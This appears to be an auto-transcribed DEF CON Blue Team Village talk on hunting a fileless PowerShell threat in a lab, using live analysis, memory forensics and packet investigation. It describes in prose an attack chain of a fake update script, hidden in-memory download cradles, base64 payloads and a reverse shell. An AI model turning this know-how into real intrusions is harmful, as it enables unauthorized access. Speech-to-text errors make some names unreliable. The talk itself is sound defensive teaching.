 Hello everyone, I am glad to be part of DEF CON again this year. Blue team Village, thank you very much for the opportunity and a special thanks to all of you for making time to attend this session. Hunt the Beast in the Shadow. Before we dive into the main topic, let me quickly tell you who is this guy speaking. I am Meisam Aslahi, a Cyber Security Practitioner and Consultant. At the moment I am acting as a Senior Director with EGS, E-Seconcil Global Services for both Reactive and Proactive Cyber Security. I am also a mentor with Blue Team Village and one of the contributors for MITREDefend projects. In my free time I do some research and I do some practical experiments and sharing my finding on the form of the write-up in my blog at CyberMeisamMedium.com or the shorter version in the daily basis at LinkedIn and Twitter. I would be more than happy to connect to you and more than happy to have you in my professional network. So here is the agenda for today. We are going to have a brief discussion about Reactive Cyber Security, a little bit of the challenges and why we need Proactive Cyber Security in parallel. We continue with explanation of a file-less threat that we are going to hunt in this trilogy with three different methods, system life analysis, memory forensics and network packet investigations. But before getting hunted, Reactive Cyber Security. In this case, we spend heavily on the technology, we deploy them in the multi-layer approach, we assume protection and we keep monitoring. In case Cyber Security happened, which must probably happen, we trigger the incident response and following by a digital forensic investigation. Nothing ranked with this approach, actually the Reactive Cyber Security is an integral part of our strategy. But according to the IBM, only 80% of the cyber threat and attacks can be successfully detected by automated Cyber Security solutions, SOC Tier 1 and Tier 2. The remaining are those sophisticated attacks that can avoid the standard detections, bypass our Cyber Security solution and remain undetected in our environment up to 280 days, which is quite a long period of time for an attacker to play around in our environment and cause a serious damages. So one of those sophisticated attack is fileless threat. So when we talk about the fileless threat, it doesn't mean that there is no file activity involved or there will be no trace remain on the hard disk. Yes, there is a rare type of the fileless threat, which completely without files, completely operates in the memory and never touch the hard disk, but they are rare and very difficult to implement it. In general, a fileless threat either need a file to operate or indirectly use a file on the hard disk partially in their life cycle. Then why the fileless threat? Because the malicious part of the activities only conducted in the memory. The malicious part are memory based and not file based. That's why we call them fileless threat. So and that's why they can bypass our automated cyber security. So having a reactive cyber security in our organization is a must, but it would be great idea if in parallel we can add on a proactive approach. In proactive cyber security, unlike the reactive, we assume a breach. We assume that despite the fact that we spend a lot of time, energy and money on our technology to fine tuning our process, educate our staff, a cyber security can occur. Yes, as explained by the Swiss cheese model, a tiny crack like misconfiguration, like human error, like a scope X and blind spot in every layer in each layer of our cyber security model could give a way to a cyber attacker to walk into our environment and conquer our cyber, our digital wonderland. That's why no harm to assume a breach. Keep hunting, fix, improve and prevent the things where it's possible. So the proactive cyber security help us to identify the unknowns and issues, discovering a new attack service, of course, effective risk management and rapid response to the threats. Most importantly, minimizing cyber dual time. The early LVD take the issue, the faster and the better we may able to respond. And during this process, of course, we can enhance our capability and the maturity level, reduce the risk and damage in overall is a main advantage of the proactive cyber security. There are a lot of proactive cyber security practices like security awareness for a staff, cyber drill to fine tune our processes. And one of the technical ones is threat hunting. Threat hunting is a human-derived practice to iteratively look for any sign of malicious activity in our environment in the past and present. So in threat hunting, we have two type in general, an structure and a structure one. In this presentation, we are focusing on the structure threat hunting which is work around educated guests or a hypothesis. The hypothesis is the initial idea that tells us what we should look for and how to look for and a set of steps that threat hunter can follow to detect a potential cyber attack. The hypothesis can be formed around an entity, for example, the high value assets or high risk users. Normally, and mainly we focus on the assets only, but we should keep in mind that behind every assets, there is a human who interact with that assets on that assets and control and have access to data on that assets. That's why it's very important in our hypothesis to consider the high value assets and high risk users. It could be intel-intel driven. For example, a new news about some attacks happen on the particular sector and if by chance we are in the same sector, the chance that we will be the next target is there. So we can trigger a hunt on that direction. So in this presentation, we are focusing on the TTP driven, which is based on the attack techniques that used by the attack vectors. In order to educate our guests and form the hypothesis, we need a threat hunt loop, which is the entire lifecycle of a threat hunting. Start with the initial observation to formulate a hypothesis. To formulate the hypothesis, we can get the aid of the cyber threat intelligence, the other services outcomes. For example, if the red team or blue team practices conducted on our environment and they find some issue and vulnerabilities, we could assume that any of those issues and vulnerabilities may be used by the attackers already and they are in our environment. Then we know what we are looking for. So in this presentation, we focus on the knowledge base. We will talk about it shortly. Once we formulate our hypothesis, we should analyze the requirement, including the source of the data, the tools we need, and the technique we need to collect the data and analyze the data. Then we continue with the investigate and hunt. During the investigate and hunt, we may pivot to the other source of the data. We may actually use a chain of hypotheses. From hypothesis one, we may move to the another educated guesses and hypotheses. So when we come to the finding, we should definitely record them and validate them. Three conditions may happen. Either the finding a firm. So in this case, we should trigger the incident response and digital forensics. We conduct the compromise assessment for the rest of assets in our network. Of course, the enrichment and the automation and most importantly, develop a new detection content with the future. We don't want to manually hunt every and each time for the similar cases, like things should be automated once they are known. So a finding could be rejected or inconclusive. In the case of rejected in, it doesn't mean that we should have peace of mind. Maybe this hypothesis rejects, we need another advanced hypothesis to look for another source of data and so on. In case of the inconclusive, it's maybe because we have the immature hypothesis that we need to work around that or we use the wrong data source and inappropriate tools. Regardless of which loop we are using, we should always review, improve, document and update everything. So let's use this threat hunt loop to hunt a file-less threat. An excellent file-less script written by Daniel Laurie that enable us to demonstrate some kind of file-less threat activities and how to hunt them. If you are keen to know more about it and having a view of a step-by-step implementation, you can follow his YouTube channel. The script is also available in his GitHub page. You can easily download them, execute them in your test environment to sharpen your skills. So the lifecycle of this attack starts with a fake update script which somehow gets into the victim machine. How it has happened, this is not the case to discuss here because we assume a breach. We assume an attacker use many techniques like social engineering or a specific vulnerability to drop that file in a victim machine and convince user to click on it. Once the user execute the script, it pretends that there is some update-related activities ongoing, but in fact, it connects to the server which has a secondary malicious script. Download them and execute them directly into the memory without touching the hard disk and then give us a reverse TCP, shell and remote access. Let's have a quick view. So here I set up a simple HTTP server in the Kali and then I run my NCLE Center on port 443. I execute the update script. As you can see, it shows that some update is going on, but in fact, it's downloading the other scripts, run them and execute them in the memory and give us a remote access. So I run this in the three different scenarios for the Windows Live analysis. I use a Windows 11 as an infected as a victim machine and I am going to use this internal and built-in command to hunt. For memory forensic, I use a Windows 10. Why not 11? This is what we will discuss at the end of this and the end of this presentation. I will use the volatility framework and bulk extractor and strings to hunt in the memory. For network packet investigation, again, I use the Windows 11 and I'm going to use Bireshark, T-Shark, KCPDOM, and T-Shark extractor. Kindly note that I'm not white listing any tools. These are simply the tools that I feel comfortable with and of course, RFMR, free and open source. So to generate the hypothesis, we are using a three different knowledge bases by the MITRE, MITRE ATT&CK, MITRE DEFEND and Cyber Analytics repository. Let the hunt begins. This type of analysis is a hunt that we can't really refuse and it simply refers to the technique in which a hunter collect the data from a running system that may provide us a better understanding of the outgoing events compared to the dead forensic or forensic image analysis. There are a lot of data, wide variety of information to be collected from system information and configuration, user group and privileges, in a style application and running services, process DLL handles, network and internet related data and of course, files and scripts. Because of the time limit, we are not going to cover all of them here, but I have advanced ongoing series on system live forensics in my blog, cybermesammedium.com. Feel free to refer to that to having more advanced write-ups about the system live analysis. So in this presentation, we are only going to focus on the three source of the data which is process and handles, network connections, files and scripts. So I'm going to start with the three simple steps that works for me in the most of the cases for initial educated guess and hypothesis which is collecting the running processes list, the process that running at that particular time in our live system, active network connection, especially the TCP and established one and the process to port mapping to identify which process is behind that particular network connection. So in order to get a list of the processes, there are a lot of tools like the normal task manager or a task list, which is the building command of the windows. However, I'm prefer to using the PS list from the Microsoft sys internal because it gives us the hierarchy of the processes using the switch T with the PS list help us to have the process lineage analysis or process three analysis which is suggested by the different knowledge base. Actually we try to understand who is the parent of each process, who are the siblings and gather the information on how a process initiated that may help us to determine whether the process is malicious or normal one. So running the PS list on the victim machine show us the two instances of the power shell which is already alarming executed with the under the CMD as a parent. So immediately trigger one of the cyber analytics repository detection cases which is power shell executions and suggest that a hunter should look for any version of the power shell that were not launched intractively. Intractively technically means that I am as a user for example, let's say network admin directly execute the power shell which in that case, the parent should be explorer. As we can see here, the parent here is a CMD means it's not intractively executed by a user. The good things about the MITRE analytics is that for most of the detection case they provide us the generic pseudo code that we can easily understand how to implement the detection rule for our automation, cyber security and solutions. So another detection case that related to the process and the process list is a common windows process names that misused by the attacker or used by the attackers to hide their malicious activities. So the attacker use a standard name to hide their malicious activity. So as a first detection hunt and detection, let's check whether these processes are fake or the real and standard windows processes. So again, the MITRE attack knowledge base give us some, the list of the detection methods on how to check whether these files, these processes are a standard. So they suggest two, if the file with no names but in unusual location are suspected or the file hashes that do not match what they're supposed to be. Actually for this case, out of this long list I'm using one of them, which is the match legitimate name or location. So a simple WMIC process helped me to get the process ID plus the executable path. And in order to have a narrow domain I just limited the finding only to those four processes. So as we can see here, it seems they are legitimated because they are executing from the standard windows system 32 folder. So let's switch to the hash values. Get file hash function of the PowerShell help us to generate the hash value of those four processes. So this hash values can be correlated via our knowledge base, our internal resources, community or simply submit to the publicly available resources like VirusTotal. In this case, I submit the con-host hash value to the VirusTotal, which confirm to be a legitimated con-host. So still no peace of mind. Even though these processes are legitimated and a standard, they are still a chance that they are misused by the attacker. That's why we go to another useful detection case by MITREDefend, which is a file access pattern analysis. They provide a very handy example for us how to detect a vipers and the ransomware in case a process has access to the multiple file types, access to the many files, which is located in the multiple location and directories. It could be a indicator of vipers or ransomware. Another handy tools of the SysInternal, which is Handel, help us to gain the information about what are the file and resources that access by the particular process. So I'm using the normal one first without any switch against the CMD and it shows that it has some access to the file which is located in the Windows Cyber Mason download. Obviously, because as we remember, our dropper executed from the same exact path. So I continue with having switch A with the Handel because it gives us more comprehensive information like the port, registry keys, threads and all the process accessed by a particular process, which is in this case, these four instances. And surprisingly, I have seen a lot of indicators. Definitely all of them has access to the Cyber Mason and downloads. So we can see a PowerShell has a Handel which technically means access to the Crypt32 DLL which basically used by the processes in case they want to use some encryption and decryption functionalities. We can see some sort of the information related to the network configuration and TCP IP which indicates that somehow this PowerShell has to do something related to the network. In generic, all of them are alarming. Let's continue with the another useful one which is a command and scripting. So MITRE attack knowledge base suggests that we should monitor a command line argument for a script executed by the any process. Those command may give us some information about what is going on and what each process try to do. So a simple WMIC process get help us, enable us to get a process ID, name and the command line and again limited to only those four. So the command executed by the CMD is interesting because it shows a batch file with the .cmd extension is executed from a download folder. Download folder alone is alarming indicator because it shows that something may download by the user in the download folder and execute it accordingly. So there are another interesting finding that I try to match them with MITRE knowledge bases as much as possible. For example, a cyber analytics again says that unusually long command line strings normally is indicator of the malware activity. However, they didn't define the long, how long it should be. But in this case, as you can see, we have a very long one that indicate the use of the download string, a function of the PowerShell that used to directly download and execute the scripts into the memory, video touching a file. And in this case, as you can see, the win security update is a script that downloaded by using the same technique and function of the PowerShell. So another things is a hide artifacts. Normally attackers try to hide their activity, yes. And in this case, you can see the use of the NOP and window style hidden to hide the windows related to the script running on the victim machine. And so let's focus on the download file because this file downloaded and directly run in the memory. The first thing we try to understand about this file and the CMD, the script with the CMD extension is what is this file and who owns it? This is what we call it a file and resource ownership. So we can easily navigate to the download folder and use a DIR with a Q switch to show the username behind that file. Here, we can see the update script is still there and is owned by the user called CyberMason. If it's possible, we should go and check the content of the file. In this case, you can see the command line which is executed and we observe it in the findings here. It shows again the download of the win security update. So what is this win security update doing? If there is a possibility, we could refer to the same URL or IP and download the script in the isolated system for further analysis, but it's not made possible all the time. And if it's possible, it may alert the attacker because if we are downloading from another location we technically tell the attacker, hey, buddy, we are downloading your script and we are going to analyze it. So in this case, we are getting the win security update and we check the content and we can see encoded, the encoded information. No makes sense why the PowerShell has had access to the Crip32 DLL because it's using the some sort of the decode and encode the data. So this is the simple base 64. We technically can use the echo and decode extension in the Kali Linux to decode the data which indicate another attempt to download the secondary scripts. So having the view of the R1 shows that Suket TCP IP client used to establish a TCP connection to a potentially attacker machine via the port 443 which is a reverse shell. So when we talk about a reverse shell means a network activity is there. The MITRE attack T1049 suggests that the attackers normally upon the initial access to the victim machine try to discover the network connection to evaluate the possibility of finding another vulnerable system or the connectivity. Let's think if the attacker can use this technique for the bad intentions, we as hunters can use it for good. So we can have the list of network connections to see what is going on. A simple net-state dash ANO help us to have the list of all the network connections especially the established TCP one. As we can see here, the network connection is still there which is established by the process ID 9392 to the attacker machine. So here, this is where we need a simple process to port mapping. I'm using a task list and find the name behind the process ID 9392 which is PowerShell. Technically means we have a script which run the PowerShell and that PowerShell give a reverse TCP shell to the attacker. So confirm case, this is the time that we can start generating the IOC and update our automated tools. As it's well said by my friend Josh, threat hunting does not use the IOC, it makes them. Now we know the rules, let's use a free tool, one of my favorite tools, a process explorer. Which can be used to have all these wonder analysis together. So just please keep in mind that we should not install anything on the victim machine and avoid copying or installing anything as much as possible. Technically we should have external storage, copy the file on that, attach it to the live system and then execute the applications and another scripts from the external storage. So up in the execution of the process explorers we can immediately see a very nice view of the process hierarchy that shows the again our CMD and the PowerShell. If you just move your cursor slowly to each process you can see the commands that the command line executed by that particular process. However, if we right click on each process and go to the properties, we have a tabs with many fantastic information. For example, the image tab give us the build time, the path, the command line executed and the current directory. And most interestingly, the TCP IP tab show us the connections established by that process. So as you can see the system live analysis give us a very good point of view about what is happening in the system. However, there are a lot of challenges that we will discuss about it in the last slides in details just to name a few. When we deal with the Windows live analysis or system live analysis, there is always a chance to have an unintentional changes, which is really risky if we change the digital forensic artifact or we change even the system estate. That's why now we are going to focus on the memory forensic which more or less give us the same information, but in a very safe way. We are in the second part of our threat hunt trilogy, which is memory forensics. Let's dive into the past. The first step in the threat hunting via memory forensics is to create a forensic image of a memory or simply a bit by bit copy of the memory of a machine under investigation. Instead of talking about the tools, let's talk about a few rules. As we discussed earlier, we should not copy or install anything on the victim machine because forensically we should avoid any intentional and unintentional changes that may happen to the system estate or the digital artifact during a threat hunt, root cause analysis, threat detection and digital forensics. We need to have a forensically clean external storage which we copy all the necessary files and application on it, attach it to the victim machine, execute the file from there and save the result into the external storage as well. So I created a forensic image of the memory of the infected system and copy it to my investigation system which is a version of Kali Linux utilized with the latest version of the volatility which is volatility framework three at this particular moment. So we can easily refer to the help of the volatility framework to get a list of all the current available plugins to retrieve the information from the memory taking from the Windows operating system. They may look a little bit limited at the moment because the volatility framework that is still new and it takes a little bit time for the community to improve it, make it more mature and develop more profiles and plugins. So let's continue with the first step in detection which is similar to what we did for the system live analysis, process lineage analysis. So the volatility command Windows PS3 give us opportunity to have a list of the processes along with their parents and siblings. As we expected, we can see two instances of the PowerShell which is run under CMD. If you may notice the process IDs here are different from what we observed during the system live analysis is simply because I run these two practices in the two different testbed in two different time, two different time slot. So again, the PowerShell is not interactively executed by a user instead is run under a CMD process. Let's have a view of the handles to see each of these processes access to any file, registry key or any other process. So in this case, I used the volatility, the Windows handle and I limited the finding to only those three suspicious processes which is the two instances of the PowerShell and the CMD. And I used a grab to only look for anything match with the file, key and process. So as we can see here, we can have access to the file by the CMD process which is located to the user cyber may some download again access to a file in the download folder is so suspicious. And we can see here the handle created from the CMD to handle another process, which is 9460. We're referring here is the instances of the PowerShell. Getting the handle for these two PowerShell again indicate the access to the CRIP32 DLL which is used for the decoding, encoding and encryption and some network and TCP IP related settings and information which indicates that this PowerShell doing something via network. So the command line scripting is pretty straight forward to extract from the memory image. We have a built in plugin called CMD line. Again, we can limited only to those three suspicious processes and we can clearly see the process ID here followed by the command executed by that particular process. Here we can see again the CMD executed as an update underscore script batch file with the CMD extension. And one of the instances of the PowerShell use the download string to download a secondary and potentially malicious script from this particular IP via the port 8000 and download strings give opportunity to this PowerShell to download directly to the memory and execute it from there without touching the hard disk. So at the moment we are using the volatility but beside I would like to introduce another two handy techniques. One is one of my favorite tools which is bulk extractor is an open source tool that can scan any hard disk image and memory image and extract a wide variety of the data. You can easily refer to the official GitHub page to check what are those data which is available to extract. Here I just run it against our memory image and extracted various data. So because we are aware of this suspicious IP I use a simple graph to look for anything matched with this IP amongst all the data which is derived by the bulk extractor and we can see here another three IP which is another three scripts downloaded and accessed from the same IP. So apart from the bulk extractor we can use built-in command strings. So we can use the cat to open the memory file and then use the string to look for any strings in the memory image that matched to our IP. Again here we can see the indicator of the download of the three additional scripts. So we are not going to repeat the same process as we did it just for the system dive analysis. If it's possible we download all these scripts into the isolated machine for the further investigations. So if you remember we discussed two challenges they are may not available at this point of the time and even if they are available downloading them may alert the attacker. Another real challenges in the memory forensics because this memory image taken in the past. So means at the moment that we are analyzing those links may not accessible anymore or may not even available. But again third hunting is all about evaluating and exploring the different opportunities. If it's possible we download all the script in the isolated environment, see the contents for further investigations. Just to recall the R1 the said the win security update is the one who has two different base 64 encoded strings when we decoded it is relieved that it's downloading another two file A1 and R1 is the one who make a reverse TCP connection. So when the reverse TCP connection is there the last step would be checking the established network connections which is can be done by the net state plugin of the volatility framework three. The good things about this plugin is that we know need to do the process to port mapping individually because once we obtain the data it shows the owner of each established connection. In this case we can see an active TCP connection to the suspicious IP which is made by PowerShell instance. So now we can confirm that our script download another additional script, execute them from the memory and give the reverse shell access to the potential attacker remotely. In the network packet investigation we may deal with the huge volume of the data. That's why I call it hunt in the ocean. So both MITRE Defend and MITRE Attack give us a list of the techniques to look for the suspicious and malicious activities in the network traffic by analyzing the network connection creation, content and flow. But in general all of the techniques talk about how we should look for the uncommon, unknown and abnormal and untrusted IPs, ports and communications. So in this section I'm using the wire shark to open and pick up a file which is captured traffic from the host which is infected by the file less thread. So in the statistics we can have a conversation and we can have a list of the endpoints. Technically the wire shark statistics give us a good idea about what is happening in the network in term of the protocol hierarchy which we cover shortly, the packet lens or endpoint and conversation. Simply the endpoint list all the endpoints and IP addresses which shows some sort of activities on the time that we collect the data while the conversation is specifically showed the list of the packets sent and received between two different endpoints. So there are a few challenges we are dealing with this kind of the data. If we don't have a baseline for the standard and normal things in our environment it could be difficult to define the uncommon to define the unknowns and to define the untrusted. Sometimes even if we have the baseline we may deal with the large volume of the data which a high diversity, dynamic nature and complexity which make a life a little bit hard for a threat hunter and the poor data management analysis could lead our threat hunt to a failure. So that's why apart from the data collection a proper data classification, filtering and unwanted data reduction plays an important role. For example here I just use a very simple data filtering to filter on the traffic to or from a victim machine which is in this case is 192.168.182.140. So this simple data filtering effectively reduce 20% of unwanted data. When we talking about the huge volume of the data 20% could be a time saver and even a life saver. So the MITREDefend Network Traffic Community Deviation suggests that once we collect a data of the network and the packets we should look for any deviation from what it's supposed to be a routine of our network. Again, if we don't have the baseline we cannot do anything. So in this example I try to just understand who is who. I use a very simple command of the TCP dump to extract all the IP addresses exists on that packet capture file. And then I write a very simple script to run the who is for the public IPs. So technically we can have the list of the IPs exists on that pick up file plus the name of the organization. So in this example all look normal but we should keep in mind not all the knowns are good because a legitimate service may be abused by the attacker to conduct the malicious activities is always good to validate the finding based on the IP reputation system, known IOCs and threat intel feeds or a few extra factors that we are going to explain now. Top protocol simply means that the highest, the top protocol that use in the conversation on the network top host means all the host that shows more activity at accordingly the top conversations is a pair of the host that talk to each other more compared to the others. The two interesting things are top listeners and top talkers. Top listeners are those who receive data more than what they send and top talkers are those who send more data compared to what they receive. So let's have a quick example about these terms. I limited our finding our packets only for the IP address related to the victim machine. So going to the statistics and endpoint tap IP version four sorted by the bytes we can have all the list of the top host which shows more activity on the time that we capture the traffic. So as we can see, there is one private IP which is belong to same network of our victim machine and it appears in the top host list. Going to the statistics and conversation and repeat the same sorted by the bytes and surprisingly we have the same IP appear in the top conversations. Means it shows one of the highest activity in the network and it has one of the highest rate of conversation with our victim. So I use a TCP dump again to extract the list of the top talkers in our network and our suspected IP, it appears there again. So means it was one of the top talkers with talk more with the endpoints in the system. But we may need more details to validate the finding because the devil is in the details. So even though this IP is among the top talkers when we dig more and go for further investigation specifically for the conversation between this IP and our victim, we notice that this IP received more data than sending. So it received more data than sending data to the victim machine. So the MITRE DS-0029 network traffic as a source of, as a data source suggests to monitor network data for uncommon data flows. For example, a client sending significantly more data than it received from the server, which is this case. Let's focus on that particular conversation and extract the protocols that mainly use in this conversation. So we apply that specific conversation as a filter to limited the data only for that conversation. So the filter, the traffic is already filtered based on the victim IP and the suspect IP. So again, from the statistics menu, we can go to the protocol hierarchy and based on what we can observe here, the TCP involved, we have some HTTP traffic and we have some data. So again, MITRE suggests to focus on the application layer protocols because the web protocols are widely used by the cyber attackers to hide the activity amongst the normal web traffic. So in the left side, I added one more filter as HTTP to not only limited the finding to this conversation, but only give us the HTTP related traffic because we have seen the HTTP traffic exist in the protocol hierarchy. So interestingly, we can see a get method used to download a few files. So again, we can focus on these files which is downloaded via the HTTP get, right click on any of them and follow the stream either the TCP or HTTP may give us opportunity to see the content. In this case, we are using the follow HTTP stream to see the content of the win security update, which I believe this is familiar to you and ring a bell for you because this is the same encoded database 64. So when we can see a few files involved in the traffic is immediately triggered a file carving detection method by the MITRE defense which says we should identify an extracting file from network application protocol. So in this filter, I only focus on the file and the hosts for that particular conversation. Here I demonstrate a TCP example that help us to extract all the host field from the request header for entire IP and entire conversation within a packet capture file. Let's get back to the file carving if we want to extract those files from the network traffic packet capture. We have a few options. I just listed two. One is a built-in option of the wire check export object that we can select the conversation and go to the file menu and select export object. We can see the list of the extracted objects from that conversation and we can select and save them all. Another interesting tools is a T-Shark extractor again the open source tools. You know that I'm a big fan of the open source and the free tools. So if we run the T-Shark extractor against our pickup file, it automatically extracts all the potential file exists in that conversation. However, they are saved based on the S-TRIM number. A simple T-Shark command help us to find the TCP S-TRIM index for the HTTP get methods. For example, here I have the S-TRIM index of 22 for the VIN security update, 23 for the A1 and 24 for the R1. Let's take a look on the R1 which has the TCP S-TRIM index of the 24. So I refer to the finding of the T-Shark extractor and open the HTTP S-TRIM 24. And if you remember the content from the previous investigations, we can have the evidence of establishing a reverse TCP. We are the 4443 which is according to the another MITRE knowledge-based information is a commonly used port by attacker to hide their activities. So let's narrow down our information this time to the HTTP to the TCP port 4443 for the same conversation. We can see a few first row are the typical standard 3-way TCP handshake. We can see some evidence of the push acknowledge acknowledge with indicate the some data transfer. So based on the MITRE again, the network traffic, we should analyze the network traffic content when it's not encrypted or the encryption is a way that we can decrypt it or is plain text in our case. So right click on any of these data and follow the TCP S-TRIM show us the command executed by the advisory and extracted again by the follow TCP S-TRIM. So we can see a few commands executed which indicate of the system information discovery. Normally the attackers do the system information discovery up at the initial access to get a better understanding of the current state of the machine. If there is any chance for privilege escalation, identify another vulnerable connection and resource in the network for the lateral movement. System live analysis give us a better understanding of ongoing events because we are doing the threat hunting while the system is still running. In some cases, we're making the forensic images are difficult or challenging like when we are dealing with a huge volume of the storage or sometimes based on the SLA when we are renting the services from the vendors we may not even have an opportunity to touch their storages. The system live analysis could be a good option. Another example is where the sounds sophisticated attacks may not leave any traces on the hard disk. The system live analysis again could be a big help. However, there are a few risk associated with this technique. For example, the risk of unintentional changes is always there because we are dealing interactively with the running system. And if by chance, the attack is still ongoing at the same time with the threat hunting activities, we may have a conflict and we may alert the attacker. And the main important one, the procedure may not be repeatable because the state of the system keep changing. Memory forensic give us a good insight about the running system activity and one point and we may have access to the system volatile data. Video risk of evidence changes, which is very important. Because here we don't touch the live system and we are conducting the threat hunt on the forensic image of a memory. It may also give us a more opportunity for threat analysis because we may have access to the data which is only exists on the memory. Talking about the challenges apart from the forensic imaging challenges that we may always face, the main challenge is a limitation of the current available framework and tools. Talking about the open source, we have a very limited number of the tools like volatility and they may not fully compatible all the time with the latest version of the operating system. These tools are community based. We may need to be a little bit patient and wait for the community and for the developers to come up with the more plugins that enable us to retrieve the data accurately from the latest version of the operating system. Network packet in investigation give us a visibility to the network activities. Not only tell us about what is happening on our network from the security point of view but issues in the network infrastructure as well. And we may not require the local access to the endpoints if we are not directly collecting the packets from the host, which give us opportunity to expand the scale of the investigation rapidly. However, there are a few serious challenges with the network packet investigation. Apart from the limited data that we have about the host level and local user activities, the encrypted data analysis challenges, the main challenge is about how we strategize the network packet collection. It must be placed before an incident happened. In the system live analysis and memory forensic, we may still have a chance to get back to the traces and collect the data that belong to the past and remain on the hardest during the live analysis and resides in the memory. But in the network packet collection, some things happen ongoing and gone and the data will be erased forever. So if we miss a chance to collect the data, we have no visibility to what has happened in that particular time. Another challenge is the data volume capturing and storing. That's why capturing the network packets is not applicable most of the time as a full-time strategy for the security solutions. If we run about one hour of the network capture for the small to medium size of the network, we may deal with a really huge volume of data. So I'm not going to whitelist any of this, any of these techniques, each of them have their own advantage and disadvantage. If there is possible, they actually work better together. So I would like to say the special thanks to my team for all the brainstorming and the support, especially Joko Tan, the man, the me, the mountain and my other lovely team members that known as a team born ready. Feel free to connect to me via the LinkedIn or Twitter if you have any additional clarification or question about this presentation or if you are willing to have a productive conversation about any cybersecurity related topic. This talk ends here, but threat hunting is a never-ending battle. Explore your scope X and unknowns. Be proactive, dive into the beats and hunt the beats, especially those who hides in shadows. Hope you all enjoy this session.